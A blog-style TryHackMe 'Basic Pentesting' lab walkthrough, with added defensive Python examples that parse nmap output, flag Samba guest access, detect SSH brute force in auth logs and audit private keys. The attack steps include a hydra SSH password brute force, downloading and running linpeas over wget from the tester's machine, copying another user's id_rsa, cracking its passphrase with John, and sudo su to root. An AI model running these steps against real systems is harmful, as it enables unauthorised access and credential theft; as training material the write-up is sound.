This writeup is the first in my TryHackME writeup series. I've carefully been dipping my toes into pentesting lately and love to keep notes so I figured I'd write them out.
This is a writeup for Basic Pentesting
nb: I'm going to assume you're running Kali Linux and you're working from an empty folder you made for this room.
Basic Pentesting
Let's take a look at this room. We're going to deploy the server and connect using OpenVPN. For more info on how to do that, visit the OpenVPN room. We'll skip all questions that don't need an answer.
Nmap setup
In order to figure out which services are running on the server we've been given, we're going to run nmap. It's going to be useful to scan with our default safe scripts, so our command will look a little like this:
nmap -sV -sC <ip>
We might need this information later, so let's make sure we save it somewhere. I like to put all my scans in a single directory in my work folder, so let's run mkdir scans and then output our nmap scan to a file in that folder:
nmap -sV -sC -oN scans/nmap <ip>
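Once the scan is saved, it's worth being able to read the file back without eyeballing it every time. The snippet below is an added example, not part of the original writeup: it parses nmap's -oN "normal output" format (host line, PORT/STATE/SERVICE/VERSION rows, and the "|" / "|_" script lines that follow each port) and produces a one-line-per-open-port summary you can keep next to the raw scan. The sample scan text, host address and version strings in it are constructed for the example and are not the room's real results.

```python
import re

# Constructed sample in nmap's -oN "normal output" format. The host, versions
# and script lines are made up for this example and are not the room's scan.
SAMPLE_NMAP = """\
# Nmap 7.94 scan initiated Mon Jan  1 12:00:00 2024 as: nmap -sV -sC -oN scans/nmap 10.10.0.5
Nmap scan report for 10.10.0.5
Host is up (0.041s latency).
Not shown: 996 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 8.0 (protocol 2.0)
|_ssh-hostkey: (constructed placeholder)
80/tcp  open  http        Apache httpd 2.4 ((Ubuntu))
| http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4 (Ubuntu)
139/tcp open  netbios-ssn Samba smbd 4.x (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.x (workgroup: WORKGROUP)
Service Info: OS: Linux
"""

HOST_RE = re.compile(r"^Nmap scan report for (?P<host>.+)$")
PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)
SCRIPT_RE = re.compile(r"^\|_?\s?(?P<text>.*)$")  # NSE script output: '| ...' or '|_...'


def parse_nmap_normal(text):
    """Parse -oN output into [{"host": ..., "ports": [{...}, ...]}, ...].

    Script output lines are attached to the port entry that precedes them,
    which is how nmap lays them out in normal output.
    """
    hosts, current = [], None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = {"host": m["host"], "ports": []}
            hosts.append(current)
            continue
        if current is None:
            continue
        m = PORT_RE.match(line)
        if m:
            current["ports"].append({
                "port": int(m["port"]),
                "proto": m["proto"],
                "state": m["state"],
                "service": m["service"],
                "version": m["version"].strip(),
                "scripts": [],
            })
            continue
        m = SCRIPT_RE.match(line)
        if m and current["ports"]:
            current["ports"][-1]["scripts"].append(m["text"])
    return hosts


def open_ports(host):
    """Return the open port numbers for one parsed host, sorted."""
    return sorted(p["port"] for p in host["ports"] if p["state"] == "open")


def exposure_summary(text):
    """One line per open port, suitable for keeping beside the raw scan file."""
    lines = []
    for host in parse_nmap_normal(text):
        for p in host["ports"]:
            if p["state"] == "open":
                lines.append(f'{host["host"]} {p["port"]}/{p["proto"]} {p["service"]} {p["version"]}')
    return lines


if __name__ == "__main__":
    for line in exposure_summary(SAMPLE_NMAP):
        print(line)
```

Point it at scans/nmap by reading the file into exposure_summary. Because each script line is attached to the port above it, you can also pull out just the http-title or ssh-hostkey lines for a given port when you revisit the scan later.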
Gobuster setup
Visiting the IP we've been given in our browser, we can see that it's running an Apache server, so it's going to be worth looking around to see which folders live on this server. It just so happens we'll need that information for question #3 as well. To find hidden folders, we're going to be running gobuster. A simple dir scan with gobuster should be enough to get the information we need to get going. We're going to be using the 2.3-medium wordlist from dirbuster for this, which should already be on your Kali install.
gobuster dir \
-u http://<ip>/ \
-w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt \
-o scans/gobuster
Question 3
If we let our gobuster run for a while, we'll find our hidden directory. Let's fill that in and take a look in the folder. There are two files there. One of them mentions that a user referred to as "J" has a weak password. Let's make sure we remember that! Let's save both of these files for later reference.
Questions 4 & 5
We're told to brute force for a username and password. I don't like brute forcing for usernames; it feels inefficient. Of course we already know we have two people who use this server, so we could just guess names. That too is inefficient, so let's do a little more digging.
If we open our nmap scan, we can see that Samba is running on this server. Let's go see if we can connect to the Samba server as an anonymous user.
smbclient //<IP>/anonymous
Sure enough, we're connected! Now we just need to find out what's in this folder, if anything. When we run a quick ls, we can see that there's a staff.txt file. Let's get staff.txt and see what's in it!
Exiting the smb connection, we can take a look at the staff.txt file.
Announcement to staff:
PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)
-Kay
Great, we now know that the two users we are going to try to hack are called Jan and Kay. If we think back to what we found in that hidden directory, we can assume that Jan has a weak password. Let's see if he is in fact the user we're looking for in question 5 and start cracking his password.
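The reason smbclient got in without any credentials is that the share allows guest access; on the administrator's side that is a couple of lines in smb.conf. As an added example (not part of the original writeup, and not the room's actual configuration), here is a small smb.conf reader that flags the settings which let an anonymous user in, run over a constructed weak config and a hardened version of the same share. The share names, paths and group name in both fragments are made up for the example.

```python
# Constructed smb.conf fragments. WEAK_CONF is the kind of configuration that
# lets smbclient connect to a share with no credentials; HARDENED_CONF is the
# same share with guest access removed. Neither is the room's real config.
WEAK_CONF = """\
[global]
   workgroup = WORKGROUP
   map to guest = bad user
   ; anyone who fails to authenticate is mapped to the guest account

[anonymous]
   path = /srv/samba/anonymous
   browseable = yes
   guest ok = yes
   read only = yes

[staff]
   path = /srv/samba/staff
   valid users = @staff
   guest ok = no
"""

HARDENED_CONF = """\
[global]
   workgroup = WORKGROUP
   map to guest = never
   restrict anonymous = 2

[anonymous]
   path = /srv/samba/anonymous
   browseable = no
   guest ok = no
   valid users = @staff
"""

TRUE_VALUES = {"yes", "true", "1"}


def parse_smb_conf(text):
    """Minimal smb.conf reader: {section: {key: value}}, keys lower-cased."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":          # comment or blank line
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip().lower()
    return sections


def guest_access_findings(conf):
    """Return (section, setting) pairs that open the server to unauthenticated use."""
    findings = []
    g = conf.get("global", {})
    if g.get("map to guest", "never") != "never":
        findings.append(("global", "map to guest = " + g["map to guest"]))
    for name, opts in conf.items():
        if name == "global":
            continue
        # 'public' is Samba's documented synonym for 'guest ok'
        if opts.get("guest ok", opts.get("public", "no")) in TRUE_VALUES:
            findings.append((name, "guest ok = yes"))
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, guest_access_findings(parse_smb_conf(conf)))
```

The weak config reports both the global "map to guest" mapping and the anonymous share; the hardened one reports nothing, because guest access is off and the share is restricted to a group. Running this over a real /etc/samba/smb.conf is a quick way to find out whether the staff.txt situation above could happen on your own server.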
Question 6 & 7
Cracking this weak password is going to be easy. We'll be using hydra to do all the work for us, and we'll use the rockyou.txt wordlist. There is an entire room to learn about hydra, so we'll skip teaching you that and just run the command:
hydra -l jan -P /usr/share/wordlists/rockyou.txt <IP> ssh
This might take a couple of minutes, so sit back and let hydra do the work for you. After a while, hydra will come back with a password we can use to connect to the server with SSH.
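From the server's side, a run like that is anything but quiet: sshd writes one "Failed password" line per attempt to the auth log, hundreds of them within seconds from a single address, usually followed by one "Accepted" line. As an added example that is not part of the original writeup, here is a small detector that summarises constructed auth.log lines per source address and flags the sources that look like a wordlist attack, plus the account that a flagged source eventually logged in as. The hostname, addresses, PIDs and timestamps in the sample are made up.

```python
import re

# Constructed sshd lines in the syslog format found in /var/log/auth.log; the
# hostname, addresses, PIDs and timestamps are made up for this example.
SAMPLE_AUTH_LOG = """\
Apr  1 12:00:01 srv01 sshd[2101]: Failed password for jan from 10.10.14.7 port 40001 ssh2
Apr  1 12:00:01 srv01 sshd[2103]: Failed password for jan from 10.10.14.7 port 40002 ssh2
Apr  1 12:00:02 srv01 sshd[2105]: Failed password for jan from 10.10.14.7 port 40003 ssh2
Apr  1 12:00:02 srv01 sshd[2107]: Failed password for invalid user admin from 10.10.14.7 port 40004 ssh2
Apr  1 12:00:03 srv01 sshd[2109]: Failed password for jan from 10.10.14.7 port 40005 ssh2
Apr  1 12:00:03 srv01 sshd[2111]: Failed password for jan from 10.10.14.7 port 40006 ssh2
Apr  1 12:00:04 srv01 sshd[2113]: Accepted password for jan from 10.10.14.7 port 40007 ssh2
Apr  1 12:05:00 srv01 sshd[2200]: Failed password for kay from 192.168.1.20 port 51000 ssh2
Apr  1 12:05:10 srv01 sshd[2202]: Accepted publickey for kay from 192.168.1.20 port 51001 ssh2
"""

AUTH_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def summarize_ssh_auth(lines):
    """Per source address: failed count, user names tried, and the account a
    later successful login used (None if no success followed the failures)."""
    stats = {}
    for line in lines:
        m = AUTH_RE.search(line)
        if not m:
            continue
        s = stats.setdefault(
            m["ip"], {"failed": 0, "users": set(), "accepted_after_failures": None}
        )
        if m["result"] == "Failed":
            s["failed"] += 1
            s["users"].add(m["user"])
        elif s["failed"] > 0:
            s["accepted_after_failures"] = m["user"]
    return stats


def brute_force_sources(stats, threshold=5):
    """Addresses with at least `threshold` failures. A wordlist run like the
    one above produces far more than this within seconds."""
    return sorted(ip for ip, s in stats.items() if s["failed"] >= threshold)


def likely_compromised(stats, threshold=5):
    """(address, account) pairs where a brute-force source then got in."""
    return sorted(
        (ip, s["accepted_after_failures"])
        for ip, s in stats.items()
        if s["failed"] >= threshold and s["accepted_after_failures"]
    )


if __name__ == "__main__":
    stats = summarize_ssh_auth(SAMPLE_AUTH_LOG.splitlines())
    print("brute-force sources:", brute_force_sources(stats))
    print("likely compromised:", likely_compromised(stats))
```

The one-off failure from 192.168.1.20 stays below the threshold and is ignored, while the burst from 10.10.14.7 is flagged together with the account it ended up logging in as. Tools like fail2ban apply the same idea continuously and block the source after a handful of failures, which is the simplest fix for the password-guessing step of this room.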
Question 8
Once connected, we'll want to escalate our privileges on this server so we can access anything we want to. We kind of already know who the other user of this server is, but let's check the /etc/passwd file to make sure!
cat /etc/passwd
Among the users listed there, we'll find the answer to question 9. Let's see if we can escalate our privileges to get access to that user.
Questions 10 & 11
I tend to use linpeas to look for ways to escalate my privileges on a server, so we're going to do the same. Not because it's necessary on this server, but because it's really useful to learn how to do.
First, we're going to want to be in the /var/tmp folder, where we have write access, so run cd /var/tmp.
Then we'll need to somehow download the linpeas.sh file onto the server. Make sure you download a copy to your own computer first from the GitHub repo and put it in your project folder. From there, we'll set up a simple HTTP server with Python. Simply run python -m SimpleHTTPServer in your project directory and you'll have a webserver running on port 8000.
From the server, we're going to now download the linpeas.sh file and run it to find possible privilege escalation methods that will work on this server. So let's run wget http://<YOUR OWN IP>:8000/linpeas.sh, which downloads the file, and then chmod +x linpeas.sh to make the file executable. Now run ./linpeas.sh and see what it comes up with.
Looking through the linpeas results, we can see that the other user has an .ssh folder with an id_rsa key in there. We might be able to use that, so let's make sure we grab that file and put it on our own computer. We'll just cat /home/<other_user>/.ssh/id_rsa, copy all of that and put it in an id_rsa file in our project directory. Because we want to be able to use it to connect to a server, we need to set the proper rights for that file. So run chmod 600 id_rsa and then try to connect to the server using
ssh -i id_rsa <other_user>@<IP>
Oh. A passphrase. We have yet to find that, but that's okay. Maybe we can just crack the id_rsa file to find the passphrase. Let's use John the Ripper for this. First, we need to turn this id_rsa file into something John can crack. ssh2john.py prints the crackable hash to standard output, so let's run /usr/share/john/ssh2john.py id_rsa > crack to put the crack-able information in the crack file.
From there, we're going to crack this file with John the Ripper, using the rockyou.txt wordlist again. I won't go into the specifics for John the Ripper as there are plenty of resources out there for that. Here's the command we're going to run:
john crack --wordlist=/usr/share/wordlists/rockyou.txt
This almost instantly comes back with our passphrase, which we can now use to connect to our server. We run our ssh command again, and now we fill in the passphrase we got from John.
ssh -i id_rsa <other_user>@<IP>
We're in! When we take a look at the files in our home folder, we see that there's a file called pass.bak. That's convenient! Let's open it using cat and fill in the answer to question 11!
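Two things made that key useful: it could be read by another account on the box, and its passphrase fell to a wordlist in seconds. Both are things the owner could have caught beforehand. The script below is an added example, not part of the original writeup: it walks the .ssh folders under a home root, checks each private key's file mode (anything beyond 0600 is a finding) and whether the key is passphrase-protected at all, by reading the cipher name stored in the OpenSSH key format and the headers of the older PEM formats. The sample keys it writes contain only the header fields needed for that check and are not usable keys; the user names it creates are made up.

```python
import base64
import os
import stat
import struct
import tempfile


def _openssh_cipher(blob):
    """Cipher name stored in an 'openssh-key-v1' blob; 'none' means no passphrase."""
    magic = b"openssh-key-v1\x00"
    if not blob.startswith(magic):
        return "unknown"
    off = len(magic)
    (n,) = struct.unpack(">I", blob[off:off + 4])
    return blob[off + 4:off + 4 + n].decode()


def key_is_encrypted(pem_text):
    """True if the private key is passphrase-protected, for the three common
    on-disk formats: OpenSSH, PKCS#8, and legacy PEM (PKCS#1)."""
    lines = [l.strip() for l in pem_text.strip().splitlines()]
    if not lines:
        return False
    if "BEGIN OPENSSH PRIVATE KEY" in lines[0]:
        body = "".join(l for l in lines[1:] if not l.startswith("-----"))
        return _openssh_cipher(base64.b64decode(body)) != "none"
    if "BEGIN ENCRYPTED PRIVATE KEY" in lines[0]:
        return True
    # Legacy PEM keys carry a 'Proc-Type: 4,ENCRYPTED' header when protected
    return any(l.startswith("Proc-Type:") and "ENCRYPTED" in l for l in lines)


def audit_private_key(path):
    """Findings for one key file: loose permissions and/or no passphrase."""
    findings = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & 0o077:
        findings.append(f"mode {mode:04o}: readable by group/other, expected 0600")
    with open(path) as f:
        if not key_is_encrypted(f.read()):
            findings.append("no passphrase: key usable as-is by anyone who can read it")
    return findings


def audit_home_keys(root):
    """Walk home directories under `root` and audit every .ssh/id_* private key."""
    report = {}
    for home in sorted(os.listdir(root)):
        ssh_dir = os.path.join(root, home, ".ssh")
        if not os.path.isdir(ssh_dir):
            continue
        for name in sorted(os.listdir(ssh_dir)):
            if name.startswith("id_") and not name.endswith(".pub"):
                path = os.path.join(ssh_dir, name)
                report[path] = audit_private_key(path)
    return report


def _constructed_openssh_key(cipher):
    """Only the magic and cipher-name fields of the OpenSSH format, which is
    all key_is_encrypted looks at; this is not a usable key."""
    blob = b"openssh-key-v1\x00" + struct.pack(">I", len(cipher)) + cipher.encode()
    b64 = base64.b64encode(blob).decode()
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{b64}\n-----END OPENSSH PRIVATE KEY-----\n"


def run_demo():
    """Build a throwaway /home-like tree with one weak and one sound key, audit it."""
    root = tempfile.mkdtemp()
    samples = {
        "weakuser": ("none", 0o644),         # unencrypted and readable by everyone
        "gooduser": ("aes256-ctr", 0o600),   # passphrase-protected, owner-only
    }
    for user, (cipher, mode) in samples.items():
        ssh_dir = os.path.join(root, user, ".ssh")
        os.makedirs(ssh_dir)
        path = os.path.join(ssh_dir, "id_rsa")
        with open(path, "w") as f:
            f.write(_constructed_openssh_key(cipher))
        os.chmod(path, mode)
    return {os.path.relpath(p, root): f for p, f in audit_home_keys(root).items()}


if __name__ == "__main__":
    for path, findings in run_demo().items():
        print(path, findings or "ok")
```

On a real host you'd call audit_home_keys("/home") as root. A key that comes back with no findings is still only as strong as its passphrase, which this check can't measure; the fix for the room's weak passphrase is a long one, or a key that never leaves the machine it was generated on.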
Bonus
As a little bonus, we can check what kind of access we have. Maybe we just want to be root at this point. Running sudo -l shows us we have access to all commands as root. Well, that's easy, let's make ourselves root then!
sudo su
There we go. Now we're root. There's a little surprise waiting for you in /root/root.txt, so go check that out!
Top comments (2)
You should check out: John Hammond
Very similar techniques in his going through videos on youtube: youtube.com/watch?v=xl2Xx5YOKcI
I actually got to THM through John Hammond's videos!